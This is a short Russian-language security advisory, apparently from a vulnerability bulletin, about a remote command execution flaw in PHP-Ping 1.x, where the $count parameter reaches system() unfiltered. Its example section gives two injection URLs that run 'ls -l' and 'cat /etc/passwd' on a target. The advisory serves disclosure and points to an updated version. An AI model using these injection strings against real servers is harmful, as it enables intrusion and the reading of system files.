Удаленное выполнение произвольных команд в PHP-Ping

Дата публикации:
31.12.2003
Всего просмотров:
1111
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHP-Ping 1.x
Уязвимые версии: PHP-Ping

Описание: Уязвимость обнаружена в PHP-Ping. Удаленный пользователь может выполнить произвольные команды на целевой системе.

Уязвимость обнаружено в переменной $count, которая вызывает system() без какой либо фильтрации. Удаленный пользователь может представить специально обработанный URL, чтобы выполнить произвольные команды операционной системы на целевой системе.

Пример/Эксплоит:

http://[target]/php-ping.php?count=1+%26+ls%20-l+%26&submit=Ping%21
http://[target]/php-ping.ph p?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21

URL производителя: http://www.theworldsend.net

Решение:Установите обновленную версию программы.

Ссылки: php-ping: Executing arbritary commands

или введите имя

CAPTCHA